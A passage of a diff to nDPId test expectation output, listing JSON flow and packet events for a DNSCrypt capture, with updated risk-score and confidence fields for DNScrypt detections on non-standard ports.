+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAXc\/csgAL0RlZgKAAABp3LcfbItAbsGBEYVm2gBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":400,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAABQ\/csAub0RumsKAAABp3LcfQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":400,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAXc\/cwgAL0RlZcKAAABp3LcfejFAbsGBA+Bm2QBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":402,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAABQ\/cwAub0RumoKAAABp3LcfQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":402,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAIc\/c1AAL0ReVYKAAABp3LcfbKzAbsCCEbGm2UBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":946739337078,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739337078,"pkt":"ZmZmZmZmRERERERECABFAADWnoNAADURNfgzD3zQCgAAARD3laYAwhtvaUCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"}
 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":2,"flow_last_seen":946739337078,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739337078,"pkt":"ZmZmZmZmRERERERECABFAADWnoVAADURNfYzD3zQCgAAARD30n8Awt6UaUGBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"}
 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":946739337079,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739337079,"pkt":"ZmZmZmZmRERERERECABFAADWnoRAADURNfczD3zQCgAAARD3m+YAwhUraUSBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"}
@@ -836,24 +836,24 @@
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":2,"flow_last_seen":946739337184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739337184,"pkt":"ZmZmZmZmRERERERECABFAADU4rYAADMRX7anctx9CgAAAQG7kEIAwObYm2mBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAACtvTpPmuzdARCZdHINGnm84Rta+Q9yZkJOIOBZH1xDWjyTETMesMGOqAFTeyjt37OaMFtfnU1CukJNcbLtFisLiXsfUndKvm3+Vr\/KkwQySWxBEvG+JEE+3LVi8Tb5u3eKex9Sd0q+bV9TqoVfU6qFX1T8BQ=="}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAIcw6lAAL0RhukKAAABBb2qxIuWAdECCHNXsoMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAG7AAwBtwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAIcw6pAAL0RhugKAAABBb2qxK3QAdECCHNXsn8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAG7AAwBtwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA